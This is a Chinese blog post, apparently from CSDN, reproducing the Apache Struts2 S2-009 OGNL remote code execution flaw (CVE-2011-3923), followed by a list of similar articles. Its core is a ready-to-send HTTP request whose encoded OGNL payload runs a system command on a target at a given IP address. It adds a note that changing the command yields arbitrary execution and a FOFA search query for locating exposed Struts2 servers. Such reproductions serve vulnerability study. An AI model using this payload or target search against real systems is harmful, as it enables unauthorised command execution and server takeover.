struts-s2-009 代码执行 (CVE-2011-3923)

于 2024-07-16 08:37:37 发布
阅读量176 收藏
点赞数 2
分类专栏: # 命令执行 文章标签: struts 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140455403
版权

一、漏洞概述

这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防护。

二、影响范围

2.1.0 - 2.3.1.1

三、漏洞地址

/ajax/example5.action

四、漏洞复现

GET /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27whoami%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1
Host: 123.58.224.8:16269
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=47be73da-b525-49e6-beec-0c5b291b2e3c; _ga=GA1.1.2097748309.1721011407; _gid=GA1.1.352847630.1721011407; JSESSIONID=3B66FB41CF4B26F3475EADF76D1DF31E
Connection: close

 通过修改whoami位置达到任意命令执行。

五、漏洞利用

1、fofa:app="struts2"

风中追风-fzzf
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 750
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
buuctf [struts2]s2-009
qq_1873822的博客
03-22 381
漏洞描述 这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
struts-s2-009 代码执行(CVE-2011-3923)
m0_65150886的博客
01-08 528
但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行它,从而绕过官方对#、\等特殊字符的防。Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。控制整个网站或者服务器。
Struts2_009_RCE CVE-2011-3923 漏洞复现
ADummy的博客
02-18 1222
Struts2_009_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGN
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 555
Apache Struts2远程代码执行漏洞(S2-009)
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
struts-2.3.32
03-08
S2-045,也被称为“CVE-2017-9791”,是一个远程代码执行(RCE)漏洞,允许攻击者通过精心构造的HTTP请求在服务器上执行任意代码。该漏洞源于Struts 2的OGNL(Object-Graph Navigation Language)表达式处理方式。...
struts-2.3.32所需jar包
03-09
s2-045漏洞,也称为“Apache Struts2远程代码执行漏洞”(CVE-2017-5638),是一个严重的问题,它允许攻击者通过发送恶意构造的HTTP请求到服务器,从而执行任意的远程代码。这个漏洞存在于使用OGNL(Object-Graph ...
Struts2-057漏洞检测python脚本
11-04
Struts2-057漏洞,也被称为CVE-2017-9805,是Apache Struts2框架中的一个严重安全漏洞。这个漏洞主要出现在Struts2的`Struts2 REST Plugin`中,允许远程攻击者通过恶意构建的HTTP请求头执行任意系统命令,从而对...
Struts2 S2-009复现
ZJT6666666的博客
12-21 200
Struts2 S2-009复现
漏洞复现----31、Struts2/S2-009
七天
06-29 543
文章目录一、漏洞原理二、环境搭建三、代码解释四、漏洞复现五、修复方法 一、漏洞原理 Struts2对s2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.act
Apache Struts2远程代码执行漏洞(S2-009)复现总结
qq_45746681的博客
10-07 604
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞成因?二、复现1.环境搭建复现 前言 记录并复现下常见的struts2漏洞,加深理解 一、漏洞成因? 在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式 当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护 二、复现 1.环境搭建 因为墨者学院代币
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)复现
JimWu的博客
09-04 1533
Apache Struts2远程代码执行漏洞(S2-009)复现 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
S2-009 远程代码执行漏洞
EC_Carrot的博客
08-07 854
漏洞简介 影响版本: 2.1.0 - 2.3.1.1 漏洞复现 在vulhub的环境里,example5.action页面里可以传入name参数,向该参数传入poc即可执行命令: GET /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowSt
Apache Struts2远程代码执行漏洞(S2-009)复现
qq_36933272的博客
09-05 1114
漏洞原理:ognl提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过parametersinterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。parametersinterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,ognl将其作为(top [‘foo’])(0)处理,并将“foo”...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-009)复现
weixin_42079912的博客
08-09 237
S2-009漏洞原因: OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。 ParametersIntercept...
vulhub-structs2-S2-009 远程代码执行漏洞复现
qq_56426046的博客
06-19 264
影响版本: 2.1.0 - 2.3.1.1。
struts2 代码执行CVE-2021-31805)
最新发布
06-25
CVE-2021-31805是一个严重的安全漏洞,它被称为Struts2漏洞或“S2-057”,影响了Struts 2.3.28及更低版本。这个漏洞涉及到远程代码执行(RCE),攻击者可以通过发送恶意请求到受影响的应用中,利用此漏洞来执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值